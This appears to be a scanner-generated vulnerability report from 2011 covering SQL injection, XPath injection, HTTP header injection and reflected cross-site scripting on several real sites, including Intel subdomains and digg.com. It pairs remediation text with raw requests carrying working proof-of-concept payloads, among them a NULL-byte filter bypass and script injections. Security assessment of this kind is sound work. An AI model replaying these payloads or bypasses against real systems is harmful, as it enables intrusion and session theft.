SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The a parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the a parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /mr/a.gif?a=6418DC'&v=1 HTTP/1.1 Host: 6418dc.r.axf8.net Proxy-Connection: keep-alive Referer: http://itcenter.intel.com/ResourceLibrary?4b801'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7e58a74ceab=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Length: 3028 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sun, 06 Feb 2011 01:55:28 GMT
<html> <head> <title>Runtime Error</title> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";fon ...[SNIP]...
Request 2
GET /mr/a.gif?a=6418DC''&v=1 HTTP/1.1 Host: 6418dc.r.axf8.net Proxy-Connection: keep-alive Referer: http://itcenter.intel.com/ResourceLibrary?4b801'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7e58a74ceab=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 0 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sun, 06 Feb 2011 01:55:28 GMT
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 02:14:10 GMT Server: Omniture DC/2.0.0 Content-Length: 394 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b was not found on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 02:14:37 GMT Server: Omniture DC/2.0.0 Content-Length: 437 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b/ss/intelcorp,intelnewscorp,intelnewsglobal was not ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 02:15:19 GMT Server: Omniture DC/2.0.0 Content-Length: 462 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20. ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
The SIP parameter appears to be vulnerable to XPath injection attacks. The payload " was submitted in the SIP parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Issue background
XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.
Issue remediation
User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 2 is copied into the Location response header. The payload fca4d%0d%0a5ca15ea1dbf was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /click/~rss-182178-c1-264110fca4d%0d%0a5ca15ea1dbf/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110fca4d 5ca15ea1dbf">he ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 4792a%0d%0a0de4dd1da6c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /click/~rss-182178-c1-2641364792a%0d%0a0de4dd1da6c/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-26413647 ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 225ee%0d%0a86d51e0577b was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /click/~rss-182178-c1-264138225ee%0d%0a86d51e0577b/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138225ee 86d51e0 ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload bdcbc%0d%0a501e00af3ac was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /click/~rss-182178-c1-264171bdcbc%0d%0a501e00af3ac/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171bdcbc 501e00af3ac">here ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload d4e32%0d%0a457ea5750ac was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /click/~rss-182178-c1-264172d4e32%0d%0a457ea5750ac/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172d4e32 457ea5750ac">here</a>
The value of REST URL parameter 2 is copied into the Location response header. The payload e2a8c%0d%0a47f57a11cd1 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /click/~rss-258152-c1-264090e2a8c%0d%0a47f57a11cd1/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-2 ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload f9a1a%0d%0a9f2d1231440 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /click/~rss-258152-c1-264093f9a1a%0d%0a9f2d1231440/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093f9a1a 9f2d1 ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload d2807%0d%0af84a0e66e75 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /click/~rss-258152-c1-264102d2807%0d%0af84a0e66e75/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102d2807 f84a0e66e75">he ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 7044c%0d%0ad07dd0e1f41 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /click/~rss-258152-c1-2641317044c%0d%0ad07dd0e1f41/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-2641317044 ...[SNIP]...
4. Cross-site scripting (reflected)previousnext There are 99 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ddf0f"><script>alert(1)</script>ae77e5693f was submitted in the REST URL parameter 1. This input was echoed as ddf0f"><script>alert(1)</script>ae77e5693f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%00ddf0f"><script>alert(1)</script>ae77e5693f?url= HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the SN request parameter is copied into the HTML document as plain text between tags. The payload ef091<script>alert(1)</script>3dacfb292a3 was submitted in the SN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Error execution Mashup Script : com.jackbe.jbp.jems.moe.runtime.JEMSException: Service not found : LOPMASHUP09ef091<script>alert(1)</script>3dacfb292a3 - Unable to find resource (LOPMASHUP09ef091<script> ...[SNIP]...
The value of the SN1 request parameter is copied into the HTML document as plain text between tags. The payload 1d7b9<script>alert(1)</script>6803e5c75c1 was submitted in the SN1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Error execution Mashup Script : com.jackbe.jbp.jems.moe.runtime.JEMSException: Service not found : LOPMASHUP111d7b9<script>alert(1)</script>6803e5c75c1 - Unable to find resource (LOPMASHUP111d7b9<script> ...[SNIP]...
The value of the SN2 request parameter is copied into the HTML document as plain text between tags. The payload 85e7a<script>alert(1)</script>3d9a1e6322b was submitted in the SN2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Error execution Mashup Script : com.jackbe.jbp.jems.moe.runtime.JEMSException: Service not found : LOPMASHUP07A85e7a<script>alert(1)</script>3d9a1e6322b - Unable to find resource (LOPMASHUP07A85e7a<script> ...[SNIP]...
The value of the SN3 request parameter is copied into the HTML document as plain text between tags. The payload 74c09<script>alert(1)</script>e0e02b85dc5 was submitted in the SN3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Error execution Mashup Script : com.jackbe.jbp.jems.moe.runtime.JEMSException: Service not found : LOPMASHUP07B74c09<script>alert(1)</script>e0e02b85dc5 - Unable to find resource (LOPMASHUP07B74c09<script> ...[SNIP]...
4.6. http://itcenter.intel.com/ResourceLibrary [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://itcenter.intel.com
Path:
/ResourceLibrary
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4b801'><script>alert(1)</script>7e58a74ceab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ResourceLibrary?4b801'><script>alert(1)</script>7e58a74ceab=1 HTTP/1.1 Host: itcenter.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 23:22:43 GMT Connection: close Content-Length: 71611
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en_US" xml:lang="en_US"> <head><met ...[SNIP]... <a href='http://itcenter.intel.com/ResourceLibrary?4b801'><script>alert(1)</script>7e58a74ceab=1&offset=0' class='single'> ...[SNIP]...
4.7. http://itcenter.intel.com/ResourceLibrary [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://itcenter.intel.com
Path:
/ResourceLibrary
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76eab"><script>alert(1)</script>9b7cdc81c1f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ResourceLibrary?76eab"><script>alert(1)</script>9b7cdc81c1f=1 HTTP/1.1 Host: itcenter.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 23:22:38 GMT Connection: close Content-Length: 71611
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en_US" xml:lang="en_US"> <head><met ...[SNIP]... <a class="filter" href="http://itcenter.intel.com/ResourceLibrary?76eab"><script>alert(1)</script>9b7cdc81c1f=1&filters=removeAll&offset=0" fcat="itcenterlanguage" fval="en_US"> ...[SNIP]...
The value of the idPrefix request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83dbe'%3balert(1)//e4158e95dd8 was submitted in the idPrefix parameter. This input was echoed as 83dbe';alert(1)//e4158e95dd8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:14:14 GMT Server: Apache X-JAL: 419 Content-Language: en-US CacheHit: D=421684 t=1296947654881565 X-JSL: D=421690 t=1296947654881565 Cache-Control: no-cache Vary: Accept-Encoding Content-Type: text/html;charset=UTF-8 Connection: close
<div class="content-large">
<!-- Parameters that have to be defined before including this ftl--> <!-- tagSets is a collection of TagSet--> <!-- Specialize ContentFilterHandler if there is a ...[SNIP]...
$j(document).ready(function() { // Parse the frameID out of the dom var parsedFrameID = $j('#jive-recentcontent-content-block-container_7llQwi83dbe';alert(1)//e4158e95dd8').parent().parent().attr('id'); parsedFrameID = parsedFrameID.substring(parsedFrameID.lastIndexOf('_') + 1, parsedFrameID.length); var pager = new jive.Pager. ...[SNIP]...
The value of the idPrefix request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e736f%3balert(1)//c5ce5e171d4 was submitted in the idPrefix parameter. This input was echoed as e736f;alert(1)//c5ce5e171d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:14:35 GMT Server: Apache X-JAL: 459 Content-Language: en-US CacheHit: D=461129 t=1296947675093028 X-JSL: D=461135 t=1296947675093028 Cache-Control: no-cache Vary: Accept-Encoding Content-Type: text/html;charset=UTF-8 Connection: close
<div class="content-large">
<!-- Parameters that have to be defined before including this ftl--> <!-- tagSets is a collection of TagSet--> <!-- Specialize ContentFilterHandler if there is a ...[SNIP]... idPrefix: '7llQwie736f%3Balert(1)%2F%2Fc5ce5e171d4' }, false); if (typeof(ContentFilterHandler_7llQwie736f;alert(1)//c5ce5e171d4) != 'undefined') { ContentFilterHandler_7llQwie736f;alert(1)//c5ce5e171d4.contentLoader = pager; } });
The value of the idPrefix request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c39a"><script>alert(1)</script>af3c9d8300 was submitted in the idPrefix parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:13:33 GMT Server: Apache X-JAL: 309 Content-Language: en-US CacheHit: D=311516 t=1296947613247827 X-JSL: D=311521 t=1296947613247827 Cache-Control: no-cache Vary: Accept-Encoding Content-Type: text/html;charset=UTF-8 Connection: close
<div class="content-large">
<!-- Parameters that have to be defined before including this ftl--> <!-- tagSets is a collection of TagSet--> <!-- Specialize ContentFilterHandler if there is a ...[SNIP]... <div class="jive-widget-filter jive-content-filter widgetclass_7llQwi3c39a"><script>alert(1)</script>af3c9d8300 clearfix"> ...[SNIP]...
The value of the idPrefix request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cd3a"%3balert(1)//4691b8f75cd was submitted in the idPrefix parameter. This input was echoed as 4cd3a";alert(1)//4691b8f75cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:13:52 GMT Server: Apache X-JAL: 344 Content-Language: en-US CacheHit: D=346411 t=1296947632747487 X-JSL: D=346417 t=1296947632747487 Cache-Control: no-cache Vary: Accept-Encoding Content-Type: text/html;charset=UTF-8 Connection: close
<div class="content-large">
<!-- Parameters that have to be defined before including this ftl--> <!-- tagSets is a collection of TagSet--> <!-- Specialize ContentFilterHandler if there is a ...[SNIP]... ontent-content-block-container_7llQwi4cd3a";alert(1)//4691b8f75cd'), "/render-widget!execute.jspa #jive-recentcontent-content-block-container_7llQwi4cd3a";alert(1)//4691b8f75cd", { frameID: parsedFrameID, widge ...[SNIP]...
The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload 488f2<script>alert(1)</script>c924c785a0a was submitted in the slotname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gampad/ads?correlator=1296956995929&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&a2ids=BOVAw%2C&cids=VxBQkM%2C&pstok=b8HFZCHCK-UKDgoKCIOqThDDhIXiFRAACgA&client=ca-pub-5783553522579509&slotname=Tile2_RightCol488f2<script>alert(1)</script>c924c785a0a&page_slots=CenterCol_Tile1%2CTile1_RightCol%2CTile2_RightCol&cust_params=Site%3DHA&cookie=ID%3D9c79886a0efcbf70%3AT%3D1296942810%3AS%3DALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig&ga_vid=1785005893.1296942825&ga_sid=1296956996&ga_hid=1372920090&ga_fc=true&url=http%3A%2F%2Fhomeappliance.manualsonline.com%2Fex%2Fmfg%2Fheadline%2Fm%2Fariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281%2Fd%2Ftype%2Fproduct_problem&ref=http%3A%2F%2Fburp%2Fshow%2F1&lmt=1296978611&dt=1296957011025&cc=11&biw=969&bih=996&ifi=3&adk=1414079277&u_tz=-360&u_his=1&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.1.103 HTTP/1.1 Host: pubads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
